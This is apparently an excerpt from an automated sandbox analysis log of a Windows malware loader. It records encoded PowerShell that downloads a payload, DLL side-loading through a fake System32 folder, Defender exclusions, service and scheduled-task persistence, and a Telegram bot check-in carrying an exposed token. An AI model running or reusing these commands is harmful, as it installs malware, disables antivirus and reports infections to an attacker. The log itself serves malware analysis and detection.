$decoded;"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f && sc start x590769
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x590769
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
          Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});"
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
          Source: unknownProcess created: C:\Windows\System32\console_zero.exe C:\Windows\System32\console_zero.exe
          Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\usvcldr64.dat"
          Source: C:\Users\user\Desktop\app64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\app64.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
          Source: C:\Users\user\Desktop\app64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"Jump to behavior
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"Jump to behavior
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"Jump to behavior
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f && sc start x590769Jump to behavior
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"Jump to behavior
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});"Jump to behavior
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"Jump to behavior
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\usvcldr64.dat"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x590769Jump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'Jump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'Jump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'Jump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
          Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
          Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
          Source: C:\Users\user\Desktop\app64.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\app64.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\System32\xcopy.exeSection loaded: ulib.dllJump to behavior
          Source: C:\Windows\System32\xcopy.exeSection loaded: ifsutil.dllJump to behavior
          Source: C:\Windows\System32\xcopy.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Windows\System32\xcopy.exeSection loaded: fsutilext.dllJump to behavior
          Source: C:\Windows\System32\xcopy.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows \System32\printui.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows \System32\printui.exeSection loaded: printui.dllJump to behavior
          Source: C:\Windows \System32\printui.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows \System32\printui.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
